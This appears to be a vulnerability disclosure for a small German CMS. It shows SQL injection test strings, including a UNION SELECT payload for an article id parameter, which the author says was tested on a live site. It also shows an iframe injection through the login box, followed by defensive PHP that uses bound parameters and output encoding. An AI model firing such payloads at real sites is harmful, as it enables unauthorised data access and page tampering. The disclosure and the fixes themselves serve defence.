leaftec cms is a small CMS being developed by a German individual / German company. Sadly the CMS is not available for free download, so I stumbled across the vulnerabilities while I was visiting a website which was based on the leaftec cms.
I contacted the vendor, but sadly my contact attempts were ignored and the vulnerabilities are still present today.
#1 SQL Injection
Vulnerable URL:
http://www.some-cool-domain.tld/article.php?id=XX
Examples for testing and injecting SQL stuff:
http://www.some-cool-domain.tld/article.php?id='
http://www.some-cool-domain.tld/article.php?id="
http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7--
(Tested on a live website using leaftec cms.)
#2 XSS / HTML Code Injection
Several parts of the CMS allow HTML and JavaScript code injection, e.g. the login box.
After the form is submitted, the CMS puts a red border around the login and password fields but also embeds the injected code in the page.
Example for HTML code:
"><iframe src=http://www.google.de></iframe>
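A defensive counterpart to both findings, as an added example rather than leaftec cms code (the CMS source is not public). The table layout, function names and in-memory SQLite database are assumptions, and PHP with the pdo_sqlite extension is assumed from the .php URL.

```php
<?php
// Hypothetical hardened handlers; leaftec's real code and schema are not public.

// Look up an article by the raw ?id= value. The value is validated as a
// positive integer and then bound as a parameter, so it never becomes SQL text.
function fetch_article(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers 404; no database error reaches the page
    }
    $stmt = $db->prepare('SELECT id, title, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Re-display a rejected login name inside the form. Encoding quotes and angle
// brackets keeps the value inside the attribute instead of closing it.
function render_login_field(string $rawUser): string
{
    $safe = htmlspecialchars($rawUser, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="user" class="error" value="' . $safe . '">';
}

// Constructed test data: in-memory SQLite stands in for the CMS database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO articles VALUES (1, 'Welcome', 'First article')");

// Inputs of the kind listed in the post, plus one legitimate id.
$ids = ['1', "'", '"', '1 AND 1=2 UNION SELECT 1,2,3,4,5,concat(version()),7--'];
foreach ($ids as $raw) {
    $article = fetch_article($db, $raw);
    printf("%-60s => %s\n", $raw, $article ? $article['title'] : 'rejected');
}

// The markup from the post comes back as inert text inside the value attribute.
echo render_login_field('"><iframe src=http://www.google.de></iframe>'), "\n";
```

Only the legitimate id returns a row, and the login field output contains `&quot;&gt;&lt;iframe` instead of live markup.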
